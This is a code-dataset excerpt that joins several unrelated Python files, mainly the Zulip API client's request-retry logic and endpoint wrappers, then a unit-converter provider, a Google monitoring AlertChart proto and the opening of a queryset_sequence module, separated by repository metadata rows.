if not self.retry_on_errors or query_state["failures"] >= 10:
return False
if self.verbose:
if not query_state["had_error_retry"]:
sys.stdout.write(
"zulip API(%s): connection error%s -- retrying."
% (
url.split(API_VERSTRING, 2)[0],
error_string,
)
)
query_state["had_error_retry"] = True
else:
sys.stdout.write(".")
sys.stdout.flush()
query_state["request"]["dont_block"] = json.dumps(True)
time.sleep(1)
query_state["failures"] += 1
return True
def end_error_retry(succeeded: bool) -> None:
if query_state["had_error_retry"] and self.verbose:
if succeeded:
print("Success!")
else:
print("Failed!")
while True:
try:
if method == "GET":
kwarg = "params"
else:
kwarg = "data"
kwargs = {kwarg: query_state["request"]}
if files:
kwargs["files"] = req_files
# Actually make the request!
res = self.session.request(
method,
urllib.parse.urljoin(self.base_url, url),
timeout=request_timeout,
**kwargs,
)
self.has_connected = True
# On 50x errors, try again after a short sleep
if str(res.status_code).startswith("5"):
if error_retry(f" (server {res.status_code})"):
continue
# Otherwise fall through and process the python-requests error normally
except (requests.exceptions.Timeout, requests.exceptions.SSLError) as e:
# Timeouts are either a Timeout or an SSLError; we
# want the later exception handlers to deal with any
# non-timeout other SSLErrors
if (
isinstance(e, requests.exceptions.SSLError)
and str(e) != "The read operation timed out"
):
raise UnrecoverableNetworkError("SSL Error")
if longpolling:
# When longpolling, we expect the timeout to fire,
# and the correct response is to just retry
continue
else:
end_error_retry(False)
raise
except requests.exceptions.ConnectionError:
if not self.has_connected:
# If we have never successfully connected to the server, don't
# go into retry logic, because the most likely scenario here is
# that somebody just hasn't started their server, or they passed
# in an invalid site.
raise UnrecoverableNetworkError("cannot connect to server " + self.base_url)
if error_retry(""):
continue
end_error_retry(False)
raise
except Exception:
# We'll split this out into more cases as we encounter new bugs.
raise
try:
if requests_json_is_function:
json_result = res.json()
else:
json_result = res.json
except Exception:
json_result = None
if json_result is not None:
end_error_retry(True)
return json_result
end_error_retry(False)
return {
"msg": "Unexpected error from the server",
"result": "http-error",
"status_code": res.status_code,
}
def call_endpoint(
self,
url: Optional[str] = None,
method: str = "POST",
request: Optional[Dict[str, Any]] = None,
longpolling: bool = False,
files: Optional[List[IO[Any]]] = None,
timeout: Optional[float] = None,
) -> Dict[str, Any]:
if request is None:
request = dict()
marshalled_request = {}
for (k, v) in request.items():
if v is not None:
marshalled_request[k] = v
versioned_url = API_VERSTRING + (url if url is not None else "")
return self.do_api_query(
marshalled_request,
versioned_url,
method=method,
longpolling=longpolling,
files=files,
timeout=timeout,
)
def call_on_each_event(
self,
callback: Callable[[Dict[str, Any]], None],
event_types: Optional[List[str]] = None,
narrow: Optional[List[List[str]]] = None,
**kwargs: object,
) -> None:
if narrow is None:
narrow = []
def do_register() -> Tuple[str, int]:
while True:
if event_types is None:
res = self.register(None, None, **kwargs)
else:
res = self.register(event_types, narrow, **kwargs)
if "error" in res["result"]:
if self.verbose:
print("Server returned error:\n{}".format(res["msg"]))
time.sleep(1)
else:
return (res["queue_id"], res["last_event_id"])
queue_id = None
# Make long-polling requests with `get_events`. Once a request
# has received an answer, pass it to the callback and before
# making a new long-polling request.
while True:
if queue_id is None:
(queue_id, last_event_id) = do_register()
try:
res = self.get_events(queue_id=queue_id, last_event_id=last_event_id)
except (
requests.exceptions.Timeout,
requests.exceptions.SSLError,
requests.exceptions.ConnectionError,
):
if self.verbose:
print(f"Connection error fetching events:\n{traceback.format_exc()}")
# TODO: Make this use our backoff library
time.sleep(1)
continue
except Exception:
print(f"Unexpected error:\n{traceback.format_exc()}")
# TODO: Make this use our backoff library
time.sleep(1)
continue
if "error" in res["result"]:
if res["result"] == "http-error":
if self.verbose:
print("HTTP error fetching events -- probably a server restart")
else:
if self.verbose:
print("Server returned error:\n{}".format(res["msg"]))
# Eventually, we'll only want the
# BAD_EVENT_QUEUE_ID check, but we check for the
# old string to support legacy Zulip servers. We
# should remove that legacy check in 2019.
if res.get("code") == "BAD_EVENT_QUEUE_ID" or res["msg"].startswith(
"Bad event queue id:"
):
# Our event queue went away, probably because
# we were asleep or the server restarted
# abnormally. We may have missed some
# events while the network was down or
# something, but there's not really anything
# we can do about it other than resuming
# getting new ones.
#
# Reset queue_id to register a new event queue.
queue_id = None
# Add a pause here to cover against potential bugs in this library
# causing a DoS attack against a server when getting errors.
# TODO: Make this back off exponentially.
time.sleep(1)
continue
for event in res["events"]:
last_event_id = max(last_event_id, int(event["id"]))
callback(event)
def call_on_each_message(
self, callback: Callable[[Dict[str, Any]], None], **kwargs: object
) -> None:
def event_callback(event: Dict[str, Any]) -> None:
if event["type"] == "message":
callback(event["message"])
self.call_on_each_event(event_callback, ["message"], None, **kwargs)
def get_messages(self, message_filters: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/get-messages for example usage
"""
return self.call_endpoint(url="messages", method="GET", request=message_filters)
def check_messages_match_narrow(self, **request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.check_messages_match_narrow(msg_ids=[11, 12],
narrow=[{'operator': 'has', 'operand': 'link'}]
)
{'result': 'success', 'msg': '', 'messages': [{...}, {...}]}
"""
return self.call_endpoint(url="messages/matches_narrow", method="GET", request=request)
def get_raw_message(self, message_id: int) -> Dict[str, str]:
"""
See examples/get-raw-message for example usage
"""
return self.call_endpoint(url=f"messages/{message_id}", method="GET")
def send_message(self, message_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/send-message for example usage.
"""
return self.call_endpoint(
url="messages",
request=message_data,
)
def upload_file(self, file: IO[Any]) -> Dict[str, Any]:
"""
See examples/upload-file for example usage.
"""
return self.call_endpoint(url="user_uploads", files=[file])
def get_attachments(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_attachments()
{'result': 'success', 'msg': '', 'attachments': [{...}, {...}]}
"""
return self.call_endpoint(url="attachments", method="GET")
def update_message(self, message_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/edit-message for example usage.
"""
return self.call_endpoint(
url="messages/%d" % (message_data["message_id"],),
method="PATCH",
request=message_data,
)
def delete_message(self, message_id: int) -> Dict[str, Any]:
"""
See examples/delete-message for example usage.
"""
return self.call_endpoint(url=f"messages/{message_id}", method="DELETE")
def update_message_flags(self, update_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/update-flags for example usage.
"""
return self.call_endpoint(url="messages/flags", method="POST", request=update_data)
def mark_all_as_read(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.mark_all_as_read()
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="mark_all_as_read",
method="POST",
)
def mark_stream_as_read(self, stream_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.mark_stream_as_read(42)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="mark_stream_as_read",
method="POST",
request={"stream_id": stream_id},
)
def mark_topic_as_read(self, stream_id: int, topic_name: str) -> Dict[str, Any]:
"""
Example usage:
>>> client.mark_all_as_read(42, 'new coffee machine')
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="mark_topic_as_read",
method="POST",
request={
"stream_id": stream_id,
"topic_name": topic_name,
},
)
def get_message_history(self, message_id: int) -> Dict[str, Any]:
"""
See examples/message-history for example usage.
"""
return self.call_endpoint(url=f"messages/{message_id}/history", method="GET")
def add_reaction(self, reaction_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.add_reaction({
'message_id': 100,
'emoji_name': 'joy',
'emoji_code': '1f602',
'reaction_type': 'unicode_emoji'
})
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="messages/{}/reactions".format(reaction_data["message_id"]),
method="POST",
request=reaction_data,
)
def remove_reaction(self, reaction_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_reaction({
'message_id': 100,
'emoji_name': 'joy',
'emoji_code': '1f602',
'reaction_type': 'unicode_emoji'
})
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url="messages/{}/reactions".format(reaction_data["message_id"]),
method="DELETE",
request=reaction_data,
)
def get_realm_emoji(self) -> Dict[str, Any]:
"""
See examples/realm-emoji for example usage.
"""
return self.call_endpoint(url="realm/emoji", method="GET")
def upload_custom_emoji(self, emoji_name: str, file_obj: IO[Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.upload_custom_emoji(emoji_name, file_obj)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(f"realm/emoji/{emoji_name}", method="POST", files=[file_obj])
def delete_custom_emoji(self, emoji_name: str) -> Dict[str, Any]:
"""
Example usage:
>>> client.delete_custom_emoji("green_tick")
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/emoji/{emoji_name}",
method="DELETE",
)
def get_realm_linkifiers(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_realm_linkifiers()
{
'result': 'success',
'msg': '',
'linkifiers': [
{
'id': 1,
'pattern': #(?P<id>[0-9]+)',
'url_format': 'https://github.com/zulip/zulip/issues/%(id)s',
},
]
}
"""
return self.call_endpoint(
url="realm/linkifiers",
method="GET",
)
def add_realm_filter(self, pattern: str, url_format_string: str) -> Dict[str, Any]:
"""
Example usage:
>>> client.add_realm_filter('#(?P<id>[0-9]+)', 'https://github.com/zulip/zulip/issues/%(id)s')
{'result': 'success', 'msg': '', 'id': 42}
"""
return self.call_endpoint(
url="realm/filters",
method="POST",
request={
"pattern": pattern,
"url_format_string": url_format_string,
},
)
def remove_realm_filter(self, filter_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_realm_filter(42)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/filters/{filter_id}",
method="DELETE",
)
def get_realm_profile_fields(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_realm_profile_fields()
{'result': 'success', 'msg': '', 'custom_fields': [{...}, {...}, {...}, {...}]}
"""
return self.call_endpoint(
url="realm/profile_fields",
method="GET",
)
def create_realm_profile_field(self, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.create_realm_profile_field(name='Phone', hint='Contact No.', field_type=1)
{'result': 'success', 'msg': '', 'id': 9}
"""
return self.call_endpoint(
url="realm/profile_fields",
method="POST",
request=request,
)
def remove_realm_profile_field(self, field_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_realm_profile_field(field_id=9)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/profile_fields/{field_id}",
method="DELETE",
)
def reorder_realm_profile_fields(self, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.reorder_realm_profile_fields(order=[8, 7, 6, 5, 4, 3, 2, 1])
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="realm/profile_fields",
method="PATCH",
request=request,
)
def update_realm_profile_field(self, field_id: int, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_realm_profile_field(field_id=1, name='Email')
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"realm/profile_fields/{field_id}",
method="PATCH",
request=request,
)
def get_server_settings(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_server_settings()
{'msg': '', 'result': 'success', 'zulip_version': '1.9.0', 'push_notifications_enabled': False, ...}
"""
return self.call_endpoint(
url="server_settings",
method="GET",
)
def get_events(self, **request: Any) -> Dict[str, Any]:
"""
See the register() method for example usage.
"""
return self.call_endpoint(
url="events",
method="GET",
longpolling=True,
request=request,
)
def register(
self,
event_types: Optional[Iterable[str]] = None,
narrow: Optional[List[List[str]]] = None,
**kwargs: object,
) -> Dict[str, Any]:
"""
Example usage:
>>> client.register(['message'])
{u'msg': u'', u'max_message_id': 112, u'last_event_id': -1, u'result': u'success', u'queue_id': u'1482093786:2'}
>>> client.get_events(queue_id='1482093786:2', last_event_id=0)
{...}
"""
if narrow is None:
narrow = []
request = dict(event_types=event_types, narrow=narrow, **kwargs)
return self.call_endpoint(
url="register",
request=request,
)
def deregister(self, queue_id: str, timeout: Optional[float] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.register(['message'])
{u'msg': u'', u'max_message_id': 113, u'last_event_id': -1, u'result': u'success', u'queue_id': u'1482093786:3'}
>>> client.deregister('1482093786:3')
{u'msg': u'', u'result': u'success'}
"""
request = dict(queue_id=queue_id)
return self.call_endpoint(
url="events",
method="DELETE",
request=request,
timeout=timeout,
)
def get_profile(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_profile()
{u'user_id': 5, u'full_name': u'Iago', u'short_name': u'iago', ...}
"""
return self.call_endpoint(
url="users/me",
method="GET",
request=request,
)
def get_user_presence(self, email: str) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_user_presence('iago@zulip.com')
{'presence': {'website': {'timestamp': 1486799122, 'status': 'active'}}, 'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"users/{email}/presence",
method="GET",
)
def get_realm_presence(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_realm_presence()
{'presences': {...}, 'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="realm/presence",
method="GET",
)
def update_presence(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_presence({
status='active',
ping_only=False,
new_user_input=False,
})
{'result': 'success', 'server_timestamp': 1333649180.7073195, 'presences': {'iago@zulip.com': { ... }}, 'msg': ''}
"""
return self.call_endpoint(
url="users/me/presence",
method="POST",
request=request,
)
def get_streams(self, **request: Any) -> Dict[str, Any]:
"""
See examples/get-public-streams for example usage.
"""
return self.call_endpoint(
url="streams",
method="GET",
request=request,
)
def update_stream(self, stream_data: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/edit-stream for example usage.
"""
return self.call_endpoint(
url="streams/{}".format(stream_data["stream_id"]),
method="PATCH",
request=stream_data,
)
def delete_stream(self, stream_id: int) -> Dict[str, Any]:
"""
See examples/delete-stream for example usage.
"""
return self.call_endpoint(
url=f"streams/{stream_id}",
method="DELETE",
)
def add_default_stream(self, stream_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.add_default_stream(5)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="default_streams",
method="POST",
request={"stream_id": stream_id},
)
def get_user_by_id(self, user_id: int, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_user_by_id(8, include_custom_profile_fields=True)
{'result': 'success', 'msg': '', 'user': [{...}, {...}]}
"""
return self.call_endpoint(
url=f"users/{user_id}",
method="GET",
request=request,
)
def deactivate_user_by_id(self, user_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.deactivate_user_by_id(8)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"users/{user_id}",
method="DELETE",
)
def reactivate_user_by_id(self, user_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.reactivate_user_by_id(8)
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url=f"users/{user_id}/reactivate",
method="POST",
)
def update_user_by_id(self, user_id: int, **request: Any) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_user_by_id(8, full_name="New Name")
{'result': 'success', 'msg': ''}
"""
if "full_name" in request and self.feature_level < 106:
# As noted in https://github.com/zulip/zulip/issues/18409,
# before feature level 106, the server expected a
# buggy double JSON encoding of the `full_name` parameter.
request["full_name"] = json.dumps(request["full_name"])
return self.call_endpoint(url=f"users/{user_id}", method="PATCH", request=request)
def get_users(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
See examples/list-users for example usage.
"""
return self.call_endpoint(
url="users",
method="GET",
request=request,
)
def get_members(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
# This exists for backwards-compatibility; we renamed this
# function get_users for consistency with the rest of the API.
# Later, we may want to add a warning for clients using this
# legacy name.
return self.get_users(request=request)
def get_alert_words(self) -> Dict[str, Any]:
"""
See examples/alert-words for example usage.
"""
return self.call_endpoint(url="users/me/alert_words", method="GET")
def add_alert_words(self, alert_words: List[str]) -> Dict[str, Any]:
"""
See examples/alert-words for example usage.
"""
return self.call_endpoint(
url="users/me/alert_words", method="POST", request={"alert_words": alert_words}
)
def remove_alert_words(self, alert_words: List[str]) -> Dict[str, Any]:
"""
See examples/alert-words for example usage.
"""
return self.call_endpoint(
url="users/me/alert_words", method="DELETE", request={"alert_words": alert_words}
)
def get_subscriptions(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
See examples/get-subscriptions for example usage.
"""
return self.call_endpoint(
url="users/me/subscriptions",
method="GET",
request=request,
)
def list_subscriptions(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
logger.warning(
"list_subscriptions() is deprecated." " Please use get_subscriptions() instead."
)
return self.get_subscriptions(request)
def add_subscriptions(self, streams: Iterable[Dict[str, Any]], **kwargs: Any) -> Dict[str, Any]:
"""
See examples/subscribe for example usage.
"""
request = dict(subscriptions=streams, **kwargs)
return self.call_endpoint(
url="users/me/subscriptions",
request=request,
)
def remove_subscriptions(
self,
streams: Iterable[str],
principals: Optional[Union[Sequence[str], Sequence[int]]] = None,
) -> Dict[str, Any]:
"""
See examples/unsubscribe for example usage.
"""
request: Dict[str, object] = dict(subscriptions=streams)
if principals is not None:
request["principals"] = principals
return self.call_endpoint(
url="users/me/subscriptions",
method="DELETE",
request=request,
)
def get_subscription_status(self, user_id: int, stream_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_subscription_status(user_id=7, stream_id=1)
{'result': 'success', 'msg': '', 'is_subscribed': False}
"""
return self.call_endpoint(
url=f"users/{user_id}/subscriptions/{stream_id}",
method="GET",
)
def mute_topic(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
See examples/mute-topic for example usage.
"""
return self.call_endpoint(
url="users/me/subscriptions/muted_topics", method="PATCH", request=request
)
def update_subscription_settings(
self, subscription_data: List[Dict[str, Any]]
) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_subscription_settings([{
'stream_id': 1,
'property': 'pin_to_top',
'value': True
},
{
'stream_id': 3,
'property': 'color',
'value': 'f00'
}])
{'result': 'success', 'msg': '', 'subscription_data': [{...}, {...}]}
"""
return self.call_endpoint(
url="users/me/subscriptions/properties",
method="POST",
request={"subscription_data": subscription_data},
)
def update_notification_settings(self, notification_settings: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_notification_settings({
'enable_stream_push_notifications': True,
'enable_offline_push_notifications': False,
})
{'enable_offline_push_notifications': False, 'enable_stream_push_notifications': True, 'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url="settings/notifications",
method="PATCH",
request=notification_settings,
)
def get_stream_id(self, stream: str) -> Dict[str, Any]:
"""
Example usage: client.get_stream_id('devel')
"""
stream_encoded = urllib.parse.quote(stream, safe="")
url = f"get_stream_id?stream={stream_encoded}"
return self.call_endpoint(
url=url,
method="GET",
request=None,
)
def get_stream_topics(self, stream_id: int) -> Dict[str, Any]:
"""
See examples/get-stream-topics for example usage.
"""
return self.call_endpoint(url=f"users/me/{stream_id}/topics", method="GET")
def get_user_groups(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_user_groups()
{'result': 'success', 'msg': '', 'user_groups': [{...}, {...}]}
"""
return self.call_endpoint(
url="user_groups",
method="GET",
)
def create_user_group(self, group_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.create_user_group({
'name': 'marketing',
'description': "Members of ACME Corp.'s marketing team.",
'members': [4, 8, 15, 16, 23, 42],
})
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url="user_groups/create",
method="POST",
request=group_data,
)
def update_user_group(self, group_data: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_user_group({
'group_id': 1,
'name': 'marketing',
'description': "Members of ACME Corp.'s marketing team.",
})
{'description': 'Description successfully updated.', 'name': 'Name successfully updated.', 'result': 'success', 'msg': ''}
"""
return self.call_endpoint(
url="user_groups/{}".format(group_data["group_id"]),
method="PATCH",
request=group_data,
)
def remove_user_group(self, group_id: int) -> Dict[str, Any]:
"""
Example usage:
>>> client.remove_user_group(42)
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url=f"user_groups/{group_id}",
method="DELETE",
)
def update_user_group_members(
self, user_group_id: int, group_data: Dict[str, Any]
) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_user_group_members(1, {
'delete': [8, 10],
'add': [11],
})
{'msg': '', 'result': 'success'}
"""
return self.call_endpoint(
url=f"user_groups/{user_group_id}/members",
method="POST",
request=group_data,
)
def get_subscribers(self, **request: Any) -> Dict[str, Any]:
"""
Example usage: client.get_subscribers(stream='devel')
"""
response = self.get_stream_id(request["stream"])
if response["result"] == "error":
return response
stream_id = response["stream_id"]
url = "streams/%d/members" % (stream_id,)
return self.call_endpoint(
url=url,
method="GET",
request=request,
)
def render_message(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.render_message(request=dict(content='foo **bar**'))
{u'msg': u'', u'rendered': u'<p>foo <strong>bar</strong></p>', u'result': u'success'}
"""
return self.call_endpoint(
url="messages/render",
method="POST",
request=request,
)
def create_user(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
See examples/create-user for example usage.
"""
return self.call_endpoint(
method="POST",
url="users",
request=request,
)
def update_storage(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_storage({'storage': {"entry 1": "value 1", "entry 2": "value 2", "entry 3": "value 3"}})
>>> client.get_storage({'keys': ["entry 1", "entry 3"]})
{'result': 'success', 'storage': {'entry 1': 'value 1', 'entry 3': 'value 3'}, 'msg': ''}
"""
return self.call_endpoint(
url="bot_storage",
method="PUT",
request=request,
)
def get_storage(self, request: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
"""
Example usage:
>>> client.update_storage({'storage': {"entry 1": "value 1", "entry 2": "value 2", "entry 3": "value 3"}})
>>> client.get_storage()
{'result': 'success', 'storage': {"entry 1": "value 1", "entry 2": "value 2", "entry 3": "value 3"}, 'msg': ''}
>>> client.get_storage({'keys': ["entry 1", "entry 3"]})
{'result': 'success', 'storage': {'entry 1': 'value 1', 'entry 3': 'value 3'}, 'msg': ''}
"""
return self.call_endpoint(
url="bot_storage",
method="GET",
request=request,
)
def set_typing_status(self, request: Dict[str, Any]) -> Dict[str, Any]:
"""
Example usage:
>>> client.set_typing_status({
'op': 'start',
'to': [9, 10],
})
{'result': 'success', 'msg': ''}
"""
return self.call_endpoint(url="typing", method="POST", request=request)
def move_topic(
self,
stream: str,
new_stream: str,
topic: str,
new_topic: Optional[str] = None,
message_id: Optional[int] = None,
propagate_mode: EditPropagateMode = "change_all",
notify_old_topic: bool = True,
notify_new_topic: bool = True,
) -> Dict[str, Any]:
"""
Move a topic from ``stream`` to ``new_stream``
The topic will be renamed if ``new_topic`` is provided.
message_id and propagation_mode let you control which messages
should be moved. The default behavior moves all messages in topic.
propagation_mode must be one of: `change_one`, `change_later`,
`change_all`. Defaults to `change_all`.
Example usage:
>>> client.move_topic('stream_a', 'stream_b', 'my_topic')
{'result': 'success', 'msg': ''}
"""
# get IDs for source and target streams
result = self.get_stream_id(stream)
if result["result"] != "success":
return result
stream = result["stream_id"]
result = self.get_stream_id(new_stream)
if result["result"] != "success":
return result
new_stream = result["stream_id"]
if message_id is None:
if propagate_mode != "change_all":
raise AttributeError(
"A message_id must be provided if " 'propagate_mode isn\'t "change_all"'
)
# ask the server for the latest message ID in the topic.
result = self.get_messages(
{
"anchor": "newest",
"narrow": [
{"operator": "stream", "operand": stream},
{"operator": "topic", "operand": topic},
],
"num_before": 1,
"num_after": 0,
}
)
if result["result"] != "success":
return result
if len(result["messages"]) <= 0:
return {"result": "error", "msg": f'No messages found in topic: "{topic}"'}
message_id = result["messages"][0]["id"]
# move topic containing message to new stream
request = {
"stream_id": new_stream,
"propagate_mode": propagate_mode,
"topic": new_topic,
"send_notification_to_old_thread": notify_old_topic,
"send_notification_to_new_thread": notify_new_topic,
}
return self.call_endpoint(
url=f"messages/{message_id}",
method="PATCH",
request=request,
)
class ZulipStream:
"""
A Zulip stream-like object
"""
def __init__(self, type: str, to: str, subject: str, **kwargs: Any) -> None:
self.client = Client(**kwargs)
self.type = type
self.to = to
self.subject = subject
def write(self, content: str) -> None:
message = {"type": self.type, "to": self.to, "subject": self.subject, "content": content}
self.client.send_message(message)
def flush(self) -> None:
pass
def hash_util_decode(string: str) -> str:
"""
Returns a decoded string given a hash_util_encode() [present in zulip/zulip's zerver/lib/url_encoding.py] encoded string.
Example usage:
>>> zulip.hash_util_decode('test.20here')
'test here'
"""
# Acknowledge custom string replacements in zulip/zulip's zerver/lib/url_encoding.py before unquoting.
# NOTE: urllib.parse.unquote already does .replace('%2E', '.').
return urllib.parse.unquote(string.replace(".", "%"))
########################################################################
# The below hackery is designed to allow running the Zulip's automated
# tests for its API documentation from old server versions against
# python-zulip-api. Generally, we expect those tests to be a way to
# validate that the Python bindings work correctly against old server
# versions.
#
# However, in cases where we've changed the interface of the Python
# bindings since the release of the relevant server version, such
# tests will fail, which is an artifact of the fact that the
# documentation that comes with that old server release is
# inconsistent with this library.
#
# The following logic is designed to work around that problem so that
# we can verify that you can use the latest version of the Python
# bindings with any server version (even if you have to read the
# current API documentation).
LEGACY_CLIENT_INTERFACE_FROM_SERVER_DOCS_VERSION = os.environ.get(
"LEGACY_CLIENT_INTERFACE_FROM_SERVER_DOCS_VERSION"
)
if LEGACY_CLIENT_INTERFACE_FROM_SERVER_DOCS_VERSION == "3":
# This block is support for testing Zulip 3.x, which documents old
# interfaces for the following functions:
class LegacyInterfaceClient(Client):
def update_user_group_members(self, group_data: Dict[str, Any]) -> Dict[str, Any]: # type: ignore # Intentional override; see comments above.
modern_group_data = group_data.copy()
group_id = group_data["group_id"]
del modern_group_data["group_id"]
return super().update_user_group_members(group_id, modern_group_data)
def get_realm_filters(self) -> Dict[str, Any]:
"""
Example usage:
>>> client.get_realm_filters()
{'result': 'success', 'msg': '', 'filters': [['#(?P<id>[0-9]+)', 'https://github.com/zulip/zulip/issues/%(id)s', 1]]}
"""
# This interface was removed in 4d482e0ef30297f716885fd8246f4638a856ba3b
return self.call_endpoint(
url="realm/filters",
method="GET",
)
Client = LegacyInterfaceClient # type: ignore # Intentional override; see comments above.
| 34.454995 | 150 | 0.554072 |
647544dc747191948872df14f7b09d4aedf1615c | 579 | py | Python | converterpy/provider/builtin.py | bilalekremharmansa/converterpy | 92ecf5ca68e672acad27693eeb83a37ae4d19d3c | [
"MIT"
] | null | null | null | converterpy/provider/builtin.py | bilalekremharmansa/converterpy | 92ecf5ca68e672acad27693eeb83a37ae4d19d3c | [
"MIT"
] | null | null | null | converterpy/provider/builtin.py | bilalekremharmansa/converterpy | 92ecf5ca68e672acad27693eeb83a37ae4d19d3c | [
"MIT"
] | null | null | null | from converterpy.provider import ConverterProvider
from converterpy.converter.si.time_converter import SITimeConverter
from converterpy.converter.si.length_converter import SILengthConverter
from converterpy.converter.si.mass_converter import SIMassConverter
from converterpy.converter.timestamp_date_converter import TimestampDateConverter
class BuiltinConverterProvider(ConverterProvider):
def provide(self):
return [
SITimeConverter(),
SILengthConverter(),
SIMassConverter(),
TimestampDateConverter(),
]
| 32.166667 | 81 | 0.766839 |
69dfc9f608a1c5c09b9d705e5db937d9a4825568 | 1,146 | py | Python | google/cloud/monitoring_dashboard_v1/types/alertchart.py | renovate-bot/python-monitoring-dashboards | c1d74f0fbb38f805d7f72f8150cbbb6e5be8c694 | [
"Apache-2.0"
] | 13 | 2020-03-24T22:54:01.000Z | 2022-03-28T22:06:31.000Z | google/cloud/monitoring_dashboard_v1/types/alertchart.py | renovate-bot/python-monitoring-dashboards | c1d74f0fbb38f805d7f72f8150cbbb6e5be8c694 | [
"Apache-2.0"
] | 51 | 2020-01-15T17:48:18.000Z | 2022-03-07T16:01:50.000Z | google/cloud/monitoring_dashboard_v1/types/alertchart.py | renovate-bot/python-monitoring-dashboards | c1d74f0fbb38f805d7f72f8150cbbb6e5be8c694 | [
"Apache-2.0"
] | 8 | 2020-01-15T00:35:12.000Z | 2022-01-29T08:11:27.000Z | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.monitoring.dashboard.v1", manifest={"AlertChart",},
)
class AlertChart(proto.Message):
r"""A chart that displays alert policy data.
Attributes:
name (str):
Required. The resource name of the alert policy. The format
is:
::
projects/[PROJECT_ID_OR_NUMBER]/alertPolicies/[ALERT_POLICY_ID]
"""
name = proto.Field(proto.STRING, number=1,)
__all__ = tuple(sorted(__protobuf__.manifest))
| 27.95122 | 79 | 0.696335 |
22bc219a2beddb699c3ce20e4d686a19e7904cb7 | 37,273 | py | Python | queryset_sequence/__init__.py | clokep/django-querysetsequence | 104006cb0245e8c314ce8c51b85a146aa1154762 | [
"0BSD"
] | 17 | 2020-10-07T14:10:39.000Z | 2022-02-10T12:03:24.000Z | queryset_sequence/__init__.py | clokep/django-querysetsequence | 104006cb0245e8c314ce8c51b85a146aa1154762 | [
"0BSD"
] | 7 | 2020-09-30T18:41:57.000Z | 2022-03-04T15:54:40.000Z | queryset_sequence/__init__.py | clokep/django-querysetsequence | 104006cb0245e8c314ce8c51b85a146aa1154762 | [
"0BSD"
] | 2 | 2022-01-11T15:04:50.000Z | 2022-02-02T18:39:07.000Z | from collections import defaultdict
import functools
